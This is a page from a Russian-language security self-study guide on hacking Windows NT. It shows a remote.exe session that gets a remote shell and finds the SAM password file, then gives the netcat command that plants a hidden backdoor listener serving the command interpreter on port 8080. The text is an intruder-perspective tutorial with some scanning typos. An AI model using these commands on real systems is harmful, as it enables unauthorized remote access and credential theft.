Иллюстрированный самоучитель по Secure Web

         

вряд ли ребята из Microsoft



D:\> remote /с 192.168.202.44 secret

*****************************

*********** remote **********

*********** CLIENT **********

*****************************

Connected..

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1998 Microsoft Corp.

C:\> dir winnt\repair\sam._

dir winnt\repair\sam._ Volume in drive С has no label.

Volume Serial Number is D837-926F

Directory of C:\winnt\repair

05/29/99 04:43p 10,406 sam.

_1 File(s) 10,406 bytes

1,243,873,280 bytes free

C:\> @q

*** SESSION OVER ***

D:\>

Да, пожалуй, вряд ли ребята из Microsoft могли придумать что-то еше более простое для хакера средней руки! Теперь мы можем запускать файлы на удаленной системе, хотя только из командной строки. Еше одним ограничением утилиты remote.exe является то, что программы, использующие консольный программный интерфейс Win32, также работать не будут. Однако в любом случае это лучше, чем вообще отсутствие возможности удаленного запуска. Как мы вскоре увидим, с ее помощью на удаленной системе можно установить более мощные средства управления.

Наконец, необходимо отметить еще одно важное свойство утилиты remote.exe, которое заключается в поддержке именованных каналов. Она будет работать на любых двух узлах, поддерживающих один и тот же протокол — IPX, TCP/IP либо NetBEUI.

Удаленный доступ к командной оболочке с помощью netcat

Еще одним простым способом организации "потайного хода" является применение "армейского швейцарского ножа TCP/IP"— утилиты netcat (http://www.ldpht. com/netcat). Утилиту netcat можно настроить на прослушивание определенного порта с последующим запуском исполняемой программы, если удаленная система подключается к данному порту. Настроив утилиту netcat на запуск интерпретатора командной строки NT, можно сделать так, чтобы этот интерпретатор запустился на удаленной системе. Синтаксис для запуска команды netcat в режиме скрытого прослушивания приведен в следующем примере. Параметр -L позволяет восстанавливать разорванное соединение; -d активизирует режим скрытого прослушивания (т.е. без обмена информацией с консолью); -е позволяет задать запускаемую программу (в данном случае — интерпретатор командой строки NT cmd. exe); а -р указывает порт, который будет прослушиваться. С:\TEMP\NC1lNT>nc -L -d -e and.exe -p 8080

Содержание  Назад  Вперед